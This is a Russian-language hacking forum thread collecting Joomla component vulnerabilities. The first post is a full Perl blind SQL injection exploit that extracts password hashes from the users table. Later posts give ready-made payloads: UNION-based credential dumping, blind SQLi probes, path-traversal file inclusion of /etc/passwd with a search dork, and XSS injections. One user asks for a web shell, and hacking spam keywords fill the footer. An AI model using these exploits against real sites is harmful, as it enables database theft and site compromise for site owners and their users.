Старый 20.10.2009, 18:21   #1
DragOn
Полусинтетика
 
Аватар для DragOn
 
Регистрация: 13.04.2009
Сообщений: 1,397
DragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспорима
DragOn вне форума

По умолчанию Обзор уязвимостей Joomla


Здесь отписываем уязвимости,баги и прочее Joomla.Начну я:
Код:
#!/usr/bin/perl -w

#---------------------------------------------------------------------------------
#joomla component com_mytube (user_id) Blind SQL Injection Vulnerability
#---------------------------------------------------------------------------------

#Author         : Chip D3 Bi0s
#Group          : LatiHackTeam
#Email          : chipdebios[alt+64]gmail.com
#Date           : 15 September 2009
#Critical Lvl   : Moderate
#Impact	        : Exposure of sensitive information
#Where	        : From Remote
#---------------------------------------------------------------------------

#Affected software description:
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#Application   : MyRemote Video Gallery
#version       : 1.0 Beta 
#Developer     : Jomtube Team
#License       : GPL            type  : Non-Commercial
#Date Added    : Aug 24, 2009
#Download      : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip
#Description   :

#MyRemote Video Gallery is the most Powerful Video Extension made for Joomla 1.5x
#which will allow you to transform your Website into a professional looking Video
#Gallery with functionality that is similar to YouTube.com. MyRemote Video Gallery
#is an open source (GNU GPL) video sharing Joomla extension has been created
#specifically for the Joomla 1.5x (MVC) Framework and can not be used without Joomla.

#MyRemote Video Gallery gives you the option to Embed Videos from Youtube and offers
#the Framework so you can create your own Remote Plugins for other Remote Servers like
#Dailymotion, Google Video, Vimeo, Blip.tv, Clipser, Revver, a which will allow you to
#run your site for low cost since all the bandwidth usage and hard drive space is located
#on the video server sites. So if you already have a large library of Videos on some
#Remote Sites like Youtube.com you can build the Video Part of your Site Very Quickly.

#---------------------------------------------------------------------------


#I.Blind SQL injection (user_id)
#Poc/Exploit:
#~~~~~~~~~~~
#http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=null
#X: Valid User_id

#+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
#+++++++++++++++++++++++++++++++++++++++


use LWP::UserAgent;
use Benchmark;
my $t1 = new Benchmark;

system ('cls');
print "\n\n";
print "\t\t[+] ---------------------------------[+]\n";
print "\t\t|          |  Chip d3 Bi0s |          |\n";
print "\t\t|        MyRemote Video Gallery Bsql  | \n";
print "\t\t|joomla component com_mytube (user_id)| \n";
print "\t\t[+]----------------------------------[+]\n\n";


print "http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=62:\n";chomp(my $target=<STDIN>);

$w="Total Videos In Category";
$column_name="concat(password)";
$table_name="jos_users";


$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

print "----------------Inyectando----------------\n";


  $host = $target . "+and+1=1&option=com_mytube&Itemid=null";
  my $res = $b->request(HTTP::Request->new(GET=>$host));  my $content = $res->content;  my $regexp = $w;
  if ($content =~ /$regexp/) {

$host = $target . "+and+1=2&option=com_mytube&Itemid=null";
  my $res = $b->request(HTTP::Request->new(GET=>$host));  my $content = $res->content;  my $regexp = $w;
  if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";}

else

{print " [-] Vulnerable :)\n";

$d=0;


for ($idusuario=62;$idusuario<=80;$idusuario++) 

{
                    
 $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$idusuario."+limit+0,1),1,1))>0&option=com_mytube&Itemid=null";
 my $res = $b->request(HTTP::Request->new(GET=>$host));
 my $content = $res->content;
 my $regexp = $w;
 if ($content =~ /$regexp/) {$idusu[$d]=$idusuario;$d=$d+1}

 }

 print " [+] Usuario existentes : "." ".join(',', @idusu) . "\n";

print  " [-] # Usuario que desea extraer : ";chomp($iduss=<STDIN>);

for ($x=1;$x<=32;$x++) 
	{

  $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))>57&option=com_mytube&Itemid=null";
  my $res = $b->request(HTTP::Request->new(GET=>$host));  my $content = $res->content;  my $regexp = $w;
  print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;}
  if ($content =~ /$regexp/)
  {
  
          for ($c=97;$c<=102;$c++) 

{
 $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null";
 my $res = $b->request(HTTP::Request->new(GET=>$host));
 my $content = $res->content;
 my $regexp = $w;


 if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;}
 }


  }
else
{

for ($c=48;$c<=57;$c++) 

{
 $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null";
 my $res = $b->request(HTTP::Request->new(GET=>$host));
 my $content = $res->content;
 my $regexp = $w;

 if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;}
 }


}

	}

print " [+] Password   :"." ".join('', @caracter) . "\n";

my $t2 = new Benchmark;
my $tt = timediff($t2, $t1);
print "El script tomo:",timestr($tt),"\n";

}
}

else

{print " [-] Exploit Fallo :(\n";}

# milw0rm.com [2009-09-21]
Код:
---------------------------------------------------------------------------------
joomla component com_jinc (newsid) Blind SQL Injection Vulnerability
---------------------------------------------------------------------------------

Author          : Chip D3 Bi0s
Group           : LatiHackTeam
Email           : chipdebios[alt+64]gmail.com
Date            : 21 September 2009
Critical Lvl    : Moderate
Impact	        : Exposure of sensitive information
Where	        : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application     : JINC (Joomla! Integrated Newsletters Component)
version         : 0.2
Developer       : lhacky
License         : GPL            type  : Non-Commercial
Date Added      : 2 September 2009
Demo            : http://www.lhacky.org/jextensions/index.php?option=com_content&view=article&id=18:how-to-use&catid=12:jinc-documentation&Itemid=28

Download        : http://www.lhacky.org/jextensions/index.php?option=com_content&view=article&id=3&Itemid=15

Description     :

JINC (Joomla! Integrated Newsletters Component) is a easy-to-use and administer newsletter component for Joomla!.
Using JINC your website users can auto-subscribe and unsubscribe to newsletters you defined.

JINC includes classical newsletter functionalities

* Newsletter, messages and subscription management.
* TAG substitution inside the messages body.
* User auto-registration with welcome message at subscription time.
* Newsletter Disclaimer.
* HTML and Text Plain messages.
* Massive or personalized messages.
* Reports on message sending.
* Subscription creating user "on the fly".
* Message preview to message creator before sending to the newsletter subscribers


---------------------------------------------------------------------------


I.Blind SQL injection (newsid) Poc/Exploit:
~~~~~~~~~
http://127.0.0.1/[path]/index.php?option=com_jinc&view=messages&newsid=1[blind]


To make, you must be registered

+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-09-21]
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: Обзор уязвимостей Joomla
Старый 28.03.2010, 11:51   #2
DragOn
Полусинтетика
 
Аватар для DragOn
 
Регистрация: 13.04.2009
Сообщений: 1,397
DragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспорима
DragOn вне форума
По умолчанию Ответ: Обзор уязвимостей Joomla

# Title: Joomla Component com_vxdate Multiple Vulnerabilities
# EDB-ID: 11790
# CVE-ID: ()
# OSVDB-ID: ()
# Author: MustLive
# Published: 2010-03-17
# Verified: yes

[hide=5]
Код:
-------------------------------------------------------------------------------------------------------------

I want to warn you about vulnerabilities in component VXDate for Joomla.


-----------------------------

Advisory: Vulnerabilities in VXDate for Joomla

-----------------------------

URL: <a href="http://websecurity.com.ua/3849/">http://websecurity.com.ua/3849/</a>

-----------------------------

Timeline:



10.05.2009 - found the vulnerabilities.

12.01.2010 - announced at my site.

18.01.2010 - informed developers.

13.03.2010 - disclosed at my site.

-----------------------------

Details:

These are Full path disclosure, SQL Injection and Cross-Site Scripting vulnerabilities.


Full path disclosure:

<a href="http://site/index.php?option=com_vxdate&ct=">http://site/index.php?option=com_vxdate&ct=</a>’

<a href="http://site/index.php?option=com_vxdate&ct=1&md=details&id=">h ttp://site/index.php?option=com_vxdate&ct=1&md=details&id=</a>’

<a href="http://site/index.php?option=com_vxdate&ct=1&md=editform&id="> http://site/index.php?option=com_vxdate&ct=1&md=editform&id=</a>’



SQL Injection:

<a href="http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version%28%29=5">http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5</a>

<a href="http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version%28%29=5">http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5</a>


XSS:

<a href="http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3C script%3Ealert%28document.cookie%29%3C/script%3E">http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3C script%3Ealert(document.cookie)%3C/script%3E</a>

<a href="http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3 Cscript%3Ealert%28document.cookie%29%3C/script%3E">http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3 Cscript%3Ealert(document.cookie)%3C/script%3E</a>

Vulnerable are potentially all versions of VXDate.
[/hide]
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: Обзор уязвимостей Joomla
Старый 26.01.2011, 11:20   #3
Cordinal
RAM 16MB
 
Аватар для Cordinal
 
Регистрация: 03.01.2010
Сообщений: 25
Cordinal на пути к лучшему
Cordinal вне форума
По умолчанию Ответ: Обзор уязвимостей Joomla

Joomla B2 Portfolio Component 1.0.0 Multiple SQL Injection

PHP код:
B2 Portfolio Joomla Component 1.0.0 Multiple SQL Injection Vulnerability
 
 Name              B2 Portfolio
 Vendor            http
://www.pulseextensions.com
 
Versions Affected 1.0.0
 
 Author            Salvatore Fresta aka Drosophila
 Website           http
://www.salvatorefresta.net
 
Contact           salvatorefresta [atgmail [dotcom
 Date              2011
-01-24
 
X
INDEX
 
 I
.    ABOUT THE APPLICATION
 II
.   DESCRIPTION
 III
.  ANALYSIS
 IV
.   SAMPLE CODE
 V
.    FIX
  
 
I
ABOUT THE APPLICATION
________________________
 
B2 Portfolio is a Joomla component to give the  user  the
option to view details of a portfolio item by zooming  it
on hover
, and to allow a full view by clicking.
 
 
IIDESCRIPTION
_______________
 
Some parameters are not properly sanitised  before  being
used in SQL queries
.
 
 
IIIANALYSIS
_____________
 
Summary
:
 
 
AMultiple SQL Injection
  
 
A
Multiple SQL Injection
_________________________
 
Id  
and  wallid  parameters  are  not  properly sanitised
before being used in SQL queries
This  can  be exploited
to manipulate SQL queries by injecting arbitrary SQL code
.
 
The following are the vulnerable functions:
 
function 
getcategoryname() {
  
$db =& JFactory::getDBO();
  
$default_category JRequest::getVar('c',  0);
  if(
$default_category == "") {
    
$query_cat 'SELECT default_category FROM #__b2portfolio_config';
    
$db->setQuery$query_cat );
    
$default_category $db->loadResult();
  }
 
  
$query 'SELECT * FROM #__b2portfolio_category where id='.$default_category;
  
$db->setQuery$query );
  
$cat_data =  $this->_db->loadObject($query);
     
  return 
$cat_data;
}
 
function 
click() {
  
$db =& JFactory::getDBO();
  
$date =& JFactory::getDate();
  
$trackDate $date->toFormat'%Y-%m-%d' );
 
  
$query 'UPDATE #__b2portfolio set click = ( click + 1 ) where id ='.$_GET['wallid'];
  
$db->setQuery$query );
  
$db->query();
}
 
 
IVSAMPLE CODE
_______________
 
A
Multiple SQL Injection
 
http
://site/path/index.php?option=com_b2portfolio&c=-1 UNION SELECT 1,concat(username,0x34,password),3,4,5 FROM jos_users
 
 
VFIX
______
 
No fix

Добавлено через 51 секунду
allCineVid Joomla Component 1.0.0 Blind SQL Injection Vulnerability

PHP код:
http://adv.salvatorefresta.net/allCineVid_Joomla_Component_1.0.0_Blind_SQL_Injection_Vulnerability-18012011.txt
 
allCineVid Joomla Component 1.0.0 Blind SQL Injection Vulnerability
 
 Name              allCineVid
 Vendor            http
://www.joomtraders.com
 
Versions Affected 1.0.0
 
 Author            Salvatore Fresta aka Drosophila
 Website           http
://www.salvatorefresta.net
 
Contact           salvatorefresta [atgmail [dotcom
 Date              2011
-01-18
 
X
INDEX
 
 I
.    ABOUT THE APPLICATION
 II
.   DESCRIPTION
 III
.  ANALYSIS
 IV
.   SAMPLE CODE
 V
.    FIX
  
 
I
ABOUT THE APPLICATION
________________________
 
allCineVid is a commercial Joomla
's extension.  It allows
you to add videos into your Joomla! website  through  the
use of modules and lightbox windows.
 
 
II. DESCRIPTION
_______________
 
A parameter is not properly sanitised  before  being used
in SQL queries.
 
 
III. ANALYSIS
_____________
 
Summary:
 
 A) Blind SQL Injection
  
 
A) Blind SQL Injection
______________________
 
The id parameter is not  properly  sanitised before being
used in SQL queries.  This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.
 
 
IV. SAMPLE CODE
_______________
 
A) Blind SQL Injection
 
http://site/path/index.php?option=com_allcinevid&tmpl=component&id=1 and 1=1
http://site/path/index.php?option=com_allcinevid&tmpl=component&id=1 and 1=0
 
 
V. FIX
______
 
No fix. 
Добавлено через 1 минуту 0 секунд
People Joomla Component 1.0.0 Local File Inclusion Vulnerability
PHP код:
####################################################################
>>>>> Author altbta [altbta@gmail.com]
>>>>> 
Home : [xp10.com]
>>>>> 
Script Joomla Component com_people
>>>>> Bug Type Local File Inclusion Vulnerability
>>>>> Dork inurl:"/index.php?option=com_people"
>>>>> Vendor http://www.ptt-solution.com
####################################################################
 
===[ Exploit ]=== [LFI]
 
http://site/index.php?option=com_people&controller=../../../../../../../../../../../../../../../../../../etc/passwd%00
 
 
####################################################################
RxH ab0-3th4b MeTo R3d-D3v!&*
DR_ALWALEED<http://www.xp10.com/xp10/members/178149-DR_ALWALEED> 
  Ответить с цитированием
Последний раз редактировалось Cordinal; 26.01.2011 в 11:20. Причина: Добавлено сообщение
Ответ: Обзор уязвимостей Joomla
Старый 01.03.2011, 20:43   #4
therf2
RAM 256MB
 
Аватар для therf2
 
Регистрация: 17.12.2010
Сообщений: 320
therf2 - весьма и весьма положительная личностьtherf2 - весьма и весьма положительная личность
therf2 вне форума
По умолчанию Ответ: Обзор уязвимостей Joomla

Joomla! <= 1.6
Активная XSS в Joomla версии 1.6 и более ранних. Уязвимость связана с недостаточной
фильтрацией входных данных в классе JFilterInput.
В версии 1.6, к примеру, можно проверить при включенном модуле User:Profile, вбив в поле About Me
следующий код:

Код:
<img src="<img src=x"/onerror=alert(1)//">
В остальных случаях и версиях данной уязвимости подвержен любой модуль который принимает данные от пользователя.
  Ответить с цитированием
Ответ: Обзор уязвимостей Joomla
Старый 04.04.2012, 02:36   #5
ambrella
Юзверь
 
Аватар для ambrella
 
Регистрация: 04.04.2012
Сообщений: 1
ambrella Новичок
ambrella вне форума
По умолчанию Ответ: Обзор уязвимостей Joomla

спасибо будем устранять, оченб полезно
  Ответить с цитированием
Ответ: Обзор уязвимостей Joomla
Старый 02.05.2015, 14:39   #6
karencho
RAM 196MB
 
Аватар для karencho
 
Регистрация: 10.04.2010
Сообщений: 205
karencho на пути к лучшему
karencho вне форума
По умолчанию Ответ: Обзор уязвимостей Joomla

ребят может кто сказать есть ли шел под джумлу 1.0.х
  Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot